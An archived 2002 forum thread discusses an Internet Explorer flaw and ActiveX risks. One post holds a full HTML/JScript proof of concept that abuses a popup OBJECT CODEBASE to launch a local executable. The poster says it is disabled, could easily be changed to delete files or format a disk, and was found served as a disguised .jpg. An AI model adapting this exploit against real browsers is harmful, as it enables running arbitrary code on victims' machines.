PDA

View Full Version : Microsoft does it again



incognito
07-11-2002, 12:14 AM
http://msn-cnet.com.com/2100-1001-942980.html?type=pt&part=msn&tag=cdf&form=base&subj=cn_fd

nvoigt
07-11-2002, 12:39 AM
"people who limited their browsing to trusted sites would be safe as would people who had installed one of the software giant's patches for its e-mail clients. "

Which is mandatory. No patches, no security.

"Larholm recommended that users disable ActiveX in the security settings for Internet Explorer"

LMAO. I mean... ActiveX means anyone can run any program he chooses on my PC. If you have ActiveX turned on, you don't need to worry about bug abuse... you gave all of the world permission to ruin your PC at will anyway.

Davros
07-11-2002, 02:17 AM
On my IE, virtually everything is disabled, including cookies, Java, and InActiveX thingies.

If a site requires me to enable Java or InActiveX or jump through some other hoop, I usually avoid it, unless I know that I really want the information on it...

In which case I use Opera, which is configured to be more relaxed.

Maybe I'm just paranoid.

Dual-Catfish
07-11-2002, 10:15 AM
I think it's talking about this flaw:



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML>
<HEAD>
<TITLE>IE6 security...</TITLE>
<META http-equiv=Content-Type content="text/html; charset=windows-1252">
<SCRIPT language=JScript>

var programName = new Array(

'c:/windows/system32/sol.exe',
'c:/winxp/system32/sol.exe',
'c:/winnt/system32/sol.exe'

);
function Init()
{
var oPopup = window.createPopup();
var oPopBody = oPopup.document.body;
var n, html='';

for(n = 0; n < programName.length; n++)
html += "<OBJECT NAME='X' CLASSID='CLSID:11111111-1111-1111-1111-111111111111' CODEBASE='"+ programName[n]+"' %1='r'></OBJECT>";
oPopBody.innerHTML = html;
oPopup.show(290, 390, 200, 200, document.body);
}
</SCRIPT>
</head>
<BODY >
You should feel lucky if your computer doesn't get reformatted right now.
</BODY>
</HTML>


I commented out a line so it doesn't work...

Fountain
07-11-2002, 04:23 PM
Where did that code come from? Enlighten me please! Ans it is BAD, right?

Dual-Catfish
07-11-2002, 05:43 PM
That? No, it's harmless. Also, it doesn't work because I removed a line. It WOULD open solitare :) Although, with a simple modification it could log you off, delete stuff, format and whatnot.

I forget exactly where I got it, but I remember it was set to log you off, so I telnetted to the website and downloaded the html. It looked harmless to me, the extension was .jpg but the browser still interpreted it as HTML.